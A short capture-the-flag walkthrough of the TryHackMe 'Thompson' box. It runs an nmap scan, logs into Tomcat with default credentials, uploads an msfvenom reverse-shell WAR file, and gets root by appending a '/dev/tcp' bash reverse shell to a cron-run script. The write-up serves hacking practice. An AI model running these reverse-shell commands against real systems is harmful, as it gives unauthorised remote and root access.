[THM] : Thompson Walkthrough
3 min readJan 25, 2023
Initial Recon
# Nmap 7.92 scan initiated Wed Jan 25 17:21:06 2023 as: nmap -sCV -v -oN init.txt 10.10.19.163
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA)
| 256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA)
|_ 256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http Apache Tomcat 8.5.5
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: Apache Tomcat/8.5.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 25 17:29:56 2023 -- 1 IP address (1 host up) scanned in 529.87 seconds
We can see tomcat is running on port 8080. I tried the default credentials from the 403 forbidden page and logged in. Now, we could upload a war file to get a reverse shell.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.6.57 LPORT=9999 -f war -o evil.war
Payload size: 1102 bytes
Final size of war file: 1102 bytes
Saved as: evil.war
In the home directory I found a file id.sh with following content.
cat id.sh
#!/bin/bash
id > test.txtThere was a cronjob running each minute that would print the output of “id” on test.txt as root.
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root cd /home/jack && bash id.shSo, I added a reverse shell to the id.sh so that it would connect back to our machine as root.
echo "/bin/bash -i >& /dev/tcp/10.17.6.57/4444 0>&1" >> id.sh
